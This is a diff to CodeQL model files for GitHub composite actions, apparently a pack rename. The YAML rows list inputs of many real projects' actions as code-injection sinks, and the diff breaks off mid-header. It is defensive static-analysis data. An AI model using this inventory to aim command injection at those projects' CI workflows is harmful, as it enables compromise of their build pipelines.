diff --git a/ql/lib/ext/generated/composite-actions/ldc-developers_ldc.model.yml b/ql/lib/ext/generated/composite-actions/ldc-developers_ldc.model.yml index c1c3bf433cdc..c34200337f2d 100644 --- a/ql/lib/ext/generated/composite-actions/ldc-developers_ldc.model.yml +++ b/ql/lib/ext/generated/composite-actions/ldc-developers_ldc.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["ldc-developers/ldc", "*", "input.cmake_flags", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/ledgerhq_ledger-live.model.yml b/ql/lib/ext/generated/composite-actions/ledgerhq_ledger-live.model.yml index af21dca82055..19d14bbe9889 100644 --- a/ql/lib/ext/generated/composite-actions/ledgerhq_ledger-live.model.yml +++ b/ql/lib/ext/generated/composite-actions/ledgerhq_ledger-live.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["ledgerhq/ledger-live", "*", "input.os", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/lerna_lerna.model.yml b/ql/lib/ext/generated/composite-actions/lerna_lerna.model.yml index 18fdeffe1ec2..0308c934d7e3 100644 --- a/ql/lib/ext/generated/composite-actions/lerna_lerna.model.yml +++ b/ql/lib/ext/generated/composite-actions/lerna_lerna.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["lerna/lerna", "*", "input.install-command", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/lf-edge_eve.model.yml b/ql/lib/ext/generated/composite-actions/lf-edge_eve.model.yml index ee67e8821744..6039a6c36285 100644 --- a/ql/lib/ext/generated/composite-actions/lf-edge_eve.model.yml +++ b/ql/lib/ext/generated/composite-actions/lf-edge_eve.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["lf-edge/eve", "*", "input.command", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/libgit2_libgit2.model.yml b/ql/lib/ext/generated/composite-actions/libgit2_libgit2.model.yml index 49caeb5f1dcf..4962f4f6281f 100644 --- a/ql/lib/ext/generated/composite-actions/libgit2_libgit2.model.yml +++ b/ql/lib/ext/generated/composite-actions/libgit2_libgit2.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["libgit2/libgit2", "*", "input.command", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/lightning-ai_pytorch-lightning.model.yml b/ql/lib/ext/generated/composite-actions/lightning-ai_pytorch-lightning.model.yml index dda74b285da7..91c9e22df2ae 100644 --- a/ql/lib/ext/generated/composite-actions/lightning-ai_pytorch-lightning.model.yml +++ b/ql/lib/ext/generated/composite-actions/lightning-ai_pytorch-lightning.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["lightning-ai/pytorch-lightning", "*", "input.name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/lightning-ai_torchmetrics.model.yml b/ql/lib/ext/generated/composite-actions/lightning-ai_torchmetrics.model.yml index 4b144103f8fb..760858b7eece 100644 --- a/ql/lib/ext/generated/composite-actions/lightning-ai_torchmetrics.model.yml +++ b/ql/lib/ext/generated/composite-actions/lightning-ai_torchmetrics.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["lightning-ai/torchmetrics", "*", "input.pypi-dir", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/linkerd_linkerd2.model.yml b/ql/lib/ext/generated/composite-actions/linkerd_linkerd2.model.yml index 931658c0bb5e..8d219108234c 100644 --- a/ql/lib/ext/generated/composite-actions/linkerd_linkerd2.model.yml +++ b/ql/lib/ext/generated/composite-actions/linkerd_linkerd2.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["linkerd/linkerd2", "*", "input.component", "code-injection", "generated"] @@ -8,7 +8,7 @@ extensions: - ["linkerd/linkerd2", "*", "input.docker-ghcr-username", "code-injection", "generated"] - ["linkerd/linkerd2", "*", "input.docker-ghcr-pat", "code-injection", "generated"] - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSummaryModel data: - ["linkerd/linkerd2", "*", "input.component", "output.image", "taint", "manual"] diff --git a/ql/lib/ext/generated/composite-actions/logseq_publish-spa.model.yml b/ql/lib/ext/generated/composite-actions/logseq_publish-spa.model.yml index f29632176626..e889a394563f 100644 --- a/ql/lib/ext/generated/composite-actions/logseq_publish-spa.model.yml +++ b/ql/lib/ext/generated/composite-actions/logseq_publish-spa.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["logseq/publish-spa", "*", "input.accent-color", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/macvim-dev_macvim.model.yml b/ql/lib/ext/generated/composite-actions/macvim-dev_macvim.model.yml index 1578e397369d..8f96daba8df1 100644 --- a/ql/lib/ext/generated/composite-actions/macvim-dev_macvim.model.yml +++ b/ql/lib/ext/generated/composite-actions/macvim-dev_macvim.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["macvim-dev/macvim", "*", "input.contents", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/mamba-org_mamba.model.yml b/ql/lib/ext/generated/composite-actions/mamba-org_mamba.model.yml index 17c45e0d8edd..1e73f98b3d3c 100644 --- a/ql/lib/ext/generated/composite-actions/mamba-org_mamba.model.yml +++ b/ql/lib/ext/generated/composite-actions/mamba-org_mamba.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["mamba-org/mamba", "*", "input.key_suffix", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/maplibre_maplibre-native.model.yml b/ql/lib/ext/generated/composite-actions/maplibre_maplibre-native.model.yml index 4e26b8728001..c92eb434d475 100644 --- a/ql/lib/ext/generated/composite-actions/maplibre_maplibre-native.model.yml +++ b/ql/lib/ext/generated/composite-actions/maplibre_maplibre-native.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["maplibre/maplibre-native", "*", "input.artifact-name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/mastodon_mastodon.model.yml b/ql/lib/ext/generated/composite-actions/mastodon_mastodon.model.yml index d5fa53d1bbb3..9de3892ac0ca 100644 --- a/ql/lib/ext/generated/composite-actions/mastodon_mastodon.model.yml +++ b/ql/lib/ext/generated/composite-actions/mastodon_mastodon.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["mastodon/mastodon", "*", "input.additional-system-dependencies", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/mavlink_qgroundcontrol.model.yml b/ql/lib/ext/generated/composite-actions/mavlink_qgroundcontrol.model.yml index f90fb1c5e63e..2ae0b823187b 100644 --- a/ql/lib/ext/generated/composite-actions/mavlink_qgroundcontrol.model.yml +++ b/ql/lib/ext/generated/composite-actions/mavlink_qgroundcontrol.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["mavlink/qgroundcontrol", "*", "input.aws_secret_access_key", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/mdanalysis_mdanalysis.model.yml b/ql/lib/ext/generated/composite-actions/mdanalysis_mdanalysis.model.yml index d16c0792c6da..8e2744b2de75 100644 --- a/ql/lib/ext/generated/composite-actions/mdanalysis_mdanalysis.model.yml +++ b/ql/lib/ext/generated/composite-actions/mdanalysis_mdanalysis.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["mdanalysis/mdanalysis", "*", "input.extra-pip-deps", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/medic_cht-core.model.yml b/ql/lib/ext/generated/composite-actions/medic_cht-core.model.yml index 4d009c2d47db..bf2e23efba83 100644 --- a/ql/lib/ext/generated/composite-actions/medic_cht-core.model.yml +++ b/ql/lib/ext/generated/composite-actions/medic_cht-core.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["medic/cht-core", "*", "input.hostname", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/medusajs_medusa.model.yml b/ql/lib/ext/generated/composite-actions/medusajs_medusa.model.yml index afd875c22057..d8d865913021 100644 --- a/ql/lib/ext/generated/composite-actions/medusajs_medusa.model.yml +++ b/ql/lib/ext/generated/composite-actions/medusajs_medusa.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["medusajs/medusa", "*", "input.pathToSeedData", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/metabase_metabase.model.yml b/ql/lib/ext/generated/composite-actions/metabase_metabase.model.yml index 680bbe27bcb4..1ac30a3790e9 100644 --- a/ql/lib/ext/generated/composite-actions/metabase_metabase.model.yml +++ b/ql/lib/ext/generated/composite-actions/metabase_metabase.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["metabase/metabase", "*", "input.organization_name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/metamask_action-create-release-pr.model.yml b/ql/lib/ext/generated/composite-actions/metamask_action-create-release-pr.model.yml index ffe074d3dea9..1c05276abe0e 100644 --- a/ql/lib/ext/generated/composite-actions/metamask_action-create-release-pr.model.yml +++ b/ql/lib/ext/generated/composite-actions/metamask_action-create-release-pr.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["metamask/action-create-release-pr", "*", "input.artifacts-path", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/metamask_action-npm-publish.model.yml b/ql/lib/ext/generated/composite-actions/metamask_action-npm-publish.model.yml index e53a58412c9e..c4b67ad5c580 100644 --- a/ql/lib/ext/generated/composite-actions/metamask_action-npm-publish.model.yml +++ b/ql/lib/ext/generated/composite-actions/metamask_action-npm-publish.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["metamask/action-npm-publish", "*", "input.subteam", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/microsoft_fluentui.model.yml b/ql/lib/ext/generated/composite-actions/microsoft_fluentui.model.yml index a899f727e395..a4400dde9d4b 100644 --- a/ql/lib/ext/generated/composite-actions/microsoft_fluentui.model.yml +++ b/ql/lib/ext/generated/composite-actions/microsoft_fluentui.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["microsoft/fluentui", "*", "input.workspaces", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/microsoft_playwright.model.yml b/ql/lib/ext/generated/composite-actions/microsoft_playwright.model.yml index 0c7c2e1bded6..8b5566b4996d 100644 --- a/ql/lib/ext/generated/composite-actions/microsoft_playwright.model.yml +++ b/ql/lib/ext/generated/composite-actions/microsoft_playwright.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["microsoft/playwright", "*", "input.report_dir", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/microsoft_wsl.model.yml b/ql/lib/ext/generated/composite-actions/microsoft_wsl.model.yml index 3d631e60dc37..349f66f4387a 100644 --- a/ql/lib/ext/generated/composite-actions/microsoft_wsl.model.yml +++ b/ql/lib/ext/generated/composite-actions/microsoft_wsl.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["microsoft/wsl", "*", "input.comment", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/milvus-io_milvus.model.yml b/ql/lib/ext/generated/composite-actions/milvus-io_milvus.model.yml index 2f8710d2cbd0..f717bf5c5d8a 100644 --- a/ql/lib/ext/generated/composite-actions/milvus-io_milvus.model.yml +++ b/ql/lib/ext/generated/composite-actions/milvus-io_milvus.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["milvus-io/milvus", "*", "input.tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/mlflow_mlflow.model.yml b/ql/lib/ext/generated/composite-actions/mlflow_mlflow.model.yml index 5490e62cdc91..b2a851a0dbab 100644 --- a/ql/lib/ext/generated/composite-actions/mlflow_mlflow.model.yml +++ b/ql/lib/ext/generated/composite-actions/mlflow_mlflow.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["mlflow/mlflow", "*", "input.python-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/modin-project_modin.model.yml b/ql/lib/ext/generated/composite-actions/modin-project_modin.model.yml index 0c6df201a1c9..054af41f284c 100644 --- a/ql/lib/ext/generated/composite-actions/modin-project_modin.model.yml +++ b/ql/lib/ext/generated/composite-actions/modin-project_modin.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["modin-project/modin", "*", "input.parallel", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/mozilla_addons-server.model.yml b/ql/lib/ext/generated/composite-actions/mozilla_addons-server.model.yml index 7d0b894f35d8..31eeed0d2516 100644 --- a/ql/lib/ext/generated/composite-actions/mozilla_addons-server.model.yml +++ b/ql/lib/ext/generated/composite-actions/mozilla_addons-server.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["mozilla/addons-server", "*", "input.run", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/mozilla_bedrock.model.yml b/ql/lib/ext/generated/composite-actions/mozilla_bedrock.model.yml index d85418c7a41e..97adf115bd2e 100644 --- a/ql/lib/ext/generated/composite-actions/mozilla_bedrock.model.yml +++ b/ql/lib/ext/generated/composite-actions/mozilla_bedrock.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["mozilla/bedrock", "*", "input.", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/mozilla_sccache.model.yml b/ql/lib/ext/generated/composite-actions/mozilla_sccache.model.yml index 074cf066e373..926230e2282f 100644 --- a/ql/lib/ext/generated/composite-actions/mozilla_sccache.model.yml +++ b/ql/lib/ext/generated/composite-actions/mozilla_sccache.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["mozilla/sccache", "*", "input.name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/msys2_setup-msys2.model.yml b/ql/lib/ext/generated/composite-actions/msys2_setup-msys2.model.yml index c4497b59af8e..0827f770e31d 100644 --- a/ql/lib/ext/generated/composite-actions/msys2_setup-msys2.model.yml +++ b/ql/lib/ext/generated/composite-actions/msys2_setup-msys2.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["msys2/setup-msys2", "*", "input.systems", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/mumble-voip_mumble.model.yml b/ql/lib/ext/generated/composite-actions/mumble-voip_mumble.model.yml index cc28e15a55b0..9314532b4263 100644 --- a/ql/lib/ext/generated/composite-actions/mumble-voip_mumble.model.yml +++ b/ql/lib/ext/generated/composite-actions/mumble-voip_mumble.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["mumble-voip/mumble", "*", "input.arch", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/nasa_fprime.model.yml b/ql/lib/ext/generated/composite-actions/nasa_fprime.model.yml index 76fb41dadf10..961ad291c0d3 100644 --- a/ql/lib/ext/generated/composite-actions/nasa_fprime.model.yml +++ b/ql/lib/ext/generated/composite-actions/nasa_fprime.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["nasa/fprime", "*", "input.location", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/nats-io_nats-server.model.yml b/ql/lib/ext/generated/composite-actions/nats-io_nats-server.model.yml index b786a672140d..d2a963c237e2 100644 --- a/ql/lib/ext/generated/composite-actions/nats-io_nats-server.model.yml +++ b/ql/lib/ext/generated/composite-actions/nats-io_nats-server.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["nats-io/nats-server", "*", "input.label", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/nearform-actions_optic-release-automation-action.model.yml b/ql/lib/ext/generated/composite-actions/nearform-actions_optic-release-automation-action.model.yml index 236ac8f2cd21..809fde338779 100644 --- a/ql/lib/ext/generated/composite-actions/nearform-actions_optic-release-automation-action.model.yml +++ b/ql/lib/ext/generated/composite-actions/nearform-actions_optic-release-automation-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["nearform-actions/optic-release-automation-action", "*", "input.build-command", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/nektos_act.model.yml b/ql/lib/ext/generated/composite-actions/nektos_act.model.yml index 64207dbca6ab..002a93c12498 100644 --- a/ql/lib/ext/generated/composite-actions/nektos_act.model.yml +++ b/ql/lib/ext/generated/composite-actions/nektos_act.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["nektos/act", "*", "input.test_input_optional", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/neo4j-contrib_neo4j-apoc-procedures.model.yml b/ql/lib/ext/generated/composite-actions/neo4j-contrib_neo4j-apoc-procedures.model.yml index 46de0ff86c67..67404b9f3118 100644 --- a/ql/lib/ext/generated/composite-actions/neo4j-contrib_neo4j-apoc-procedures.model.yml +++ b/ql/lib/ext/generated/composite-actions/neo4j-contrib_neo4j-apoc-procedures.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["neo4j-contrib/neo4j-apoc-procedures", "*", "input.project-name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/neondatabase_neon.model.yml b/ql/lib/ext/generated/composite-actions/neondatabase_neon.model.yml index a07b223777b0..e4eb1d83db2c 100644 --- a/ql/lib/ext/generated/composite-actions/neondatabase_neon.model.yml +++ b/ql/lib/ext/generated/composite-actions/neondatabase_neon.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["neondatabase/neon", "*", "input.save_perf_report", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/neovim_neovim.model.yml b/ql/lib/ext/generated/composite-actions/neovim_neovim.model.yml index e3470982f53d..fc29f5fc8ff3 100644 --- a/ql/lib/ext/generated/composite-actions/neovim_neovim.model.yml +++ b/ql/lib/ext/generated/composite-actions/neovim_neovim.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["neovim/neovim", "*", "input.install_flags", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/nhost_nhost.model.yml b/ql/lib/ext/generated/composite-actions/nhost_nhost.model.yml index 87535288d265..352d2550b897 100644 --- a/ql/lib/ext/generated/composite-actions/nhost_nhost.model.yml +++ b/ql/lib/ext/generated/composite-actions/nhost_nhost.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["nhost/nhost", "*", "input.config", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/nix-community_nixos-wsl.model.yml b/ql/lib/ext/generated/composite-actions/nix-community_nixos-wsl.model.yml index 28249c824287..954216bb04ea 100644 --- a/ql/lib/ext/generated/composite-actions/nix-community_nixos-wsl.model.yml +++ b/ql/lib/ext/generated/composite-actions/nix-community_nixos-wsl.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["nix-community/nixos-wsl", "*", "input.filename", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/novuhq_novu.model.yml b/ql/lib/ext/generated/composite-actions/novuhq_novu.model.yml index 8d1bbce631fc..dcb267331603 100644 --- a/ql/lib/ext/generated/composite-actions/novuhq_novu.model.yml +++ b/ql/lib/ext/generated/composite-actions/novuhq_novu.model.yml @@ -1,11 +1,11 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["novuhq/novu", "*", "input.tag", "code-injection", "generated"] - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSummaryModel data: - ["novuhq/novu", "*", "input.docker_name", "output.image", "taint", "manual"] diff --git a/ql/lib/ext/generated/composite-actions/nymtech_nym.model.yml b/ql/lib/ext/generated/composite-actions/nymtech_nym.model.yml index 3c5f85a6e79e..4608da8fe61f 100644 --- a/ql/lib/ext/generated/composite-actions/nymtech_nym.model.yml +++ b/ql/lib/ext/generated/composite-actions/nymtech_nym.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["nymtech/nym", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/obsproject_obs-studio.model.yml b/ql/lib/ext/generated/composite-actions/obsproject_obs-studio.model.yml index 01a552361ecf..e38ba9b4edf9 100644 --- a/ql/lib/ext/generated/composite-actions/obsproject_obs-studio.model.yml +++ b/ql/lib/ext/generated/composite-actions/obsproject_obs-studio.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["obsproject/obs-studio", "*", "input.failCondition", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/ocaml_dune.model.yml b/ql/lib/ext/generated/composite-actions/ocaml_dune.model.yml index ab2e86ce8681..48a1bb5ca8b8 100644 --- a/ql/lib/ext/generated/composite-actions/ocaml_dune.model.yml +++ b/ql/lib/ext/generated/composite-actions/ocaml_dune.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["ocaml/dune", "*", "input.OCAML_COMPILER", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/oneflow-inc_oneflow.model.yml b/ql/lib/ext/generated/composite-actions/oneflow-inc_oneflow.model.yml index 8d6dd73bfd91..744b025fa655 100644 --- a/ql/lib/ext/generated/composite-actions/oneflow-inc_oneflow.model.yml +++ b/ql/lib/ext/generated/composite-actions/oneflow-inc_oneflow.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["oneflow-inc/oneflow", "*", "input.extra_flags", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/open-telemetry_opentelemetry-ruby-contrib.model.yml b/ql/lib/ext/generated/composite-actions/open-telemetry_opentelemetry-ruby-contrib.model.yml index a20cbb1e24da..d6c91a3853ca 100644 --- a/ql/lib/ext/generated/composite-actions/open-telemetry_opentelemetry-ruby-contrib.model.yml +++ b/ql/lib/ext/generated/composite-actions/open-telemetry_opentelemetry-ruby-contrib.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["open-telemetry/opentelemetry-ruby-contrib", "*", "input.gem", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/open-telemetry_opentelemetry-ruby.model.yml b/ql/lib/ext/generated/composite-actions/open-telemetry_opentelemetry-ruby.model.yml index 62785bef86bf..e49d896bce08 100644 --- a/ql/lib/ext/generated/composite-actions/open-telemetry_opentelemetry-ruby.model.yml +++ b/ql/lib/ext/generated/composite-actions/open-telemetry_opentelemetry-ruby.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["open-telemetry/opentelemetry-ruby", "*", "input.gem", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/open-watcom_open-watcom-v2.model.yml b/ql/lib/ext/generated/composite-actions/open-watcom_open-watcom-v2.model.yml index 9c10a54abc71..66240fb41c37 100644 --- a/ql/lib/ext/generated/composite-actions/open-watcom_open-watcom-v2.model.yml +++ b/ql/lib/ext/generated/composite-actions/open-watcom_open-watcom-v2.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["open-watcom/open-watcom-v2", "*", "input.fullname", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/openapitools_openapi-generator.model.yml b/ql/lib/ext/generated/composite-actions/openapitools_openapi-generator.model.yml index 4145ec195690..e9fbe3a29507 100644 --- a/ql/lib/ext/generated/composite-actions/openapitools_openapi-generator.model.yml +++ b/ql/lib/ext/generated/composite-actions/openapitools_openapi-generator.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["openapitools/openapi-generator", "*", "input.args", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/openjdk_jdk.model.yml b/ql/lib/ext/generated/composite-actions/openjdk_jdk.model.yml index 5b63c9fec069..bd94706b140a 100644 --- a/ql/lib/ext/generated/composite-actions/openjdk_jdk.model.yml +++ b/ql/lib/ext/generated/composite-actions/openjdk_jdk.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["openjdk/jdk", "*", "input.debug-suffix", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/opensearch-project_opensearch-net.model.yml b/ql/lib/ext/generated/composite-actions/opensearch-project_opensearch-net.model.yml index f21389b08b02..39324776e809 100644 --- a/ql/lib/ext/generated/composite-actions/opensearch-project_opensearch-net.model.yml +++ b/ql/lib/ext/generated/composite-actions/opensearch-project_opensearch-net.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["opensearch-project/opensearch-net", "*", "input.version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/opensearch-project_security.model.yml b/ql/lib/ext/generated/composite-actions/opensearch-project_security.model.yml index 1a6f42c25f66..80c781f72df7 100644 --- a/ql/lib/ext/generated/composite-actions/opensearch-project_security.model.yml +++ b/ql/lib/ext/generated/composite-actions/opensearch-project_security.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["opensearch-project/security", "*", "input.plugin-branch", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/opentrons_opentrons.model.yml b/ql/lib/ext/generated/composite-actions/opentrons_opentrons.model.yml index ea48b84310cb..abee0f74453d 100644 --- a/ql/lib/ext/generated/composite-actions/opentrons_opentrons.model.yml +++ b/ql/lib/ext/generated/composite-actions/opentrons_opentrons.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["opentrons/opentrons", "*", "input.destPrefix", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/openvinotoolkit_openvino.model.yml 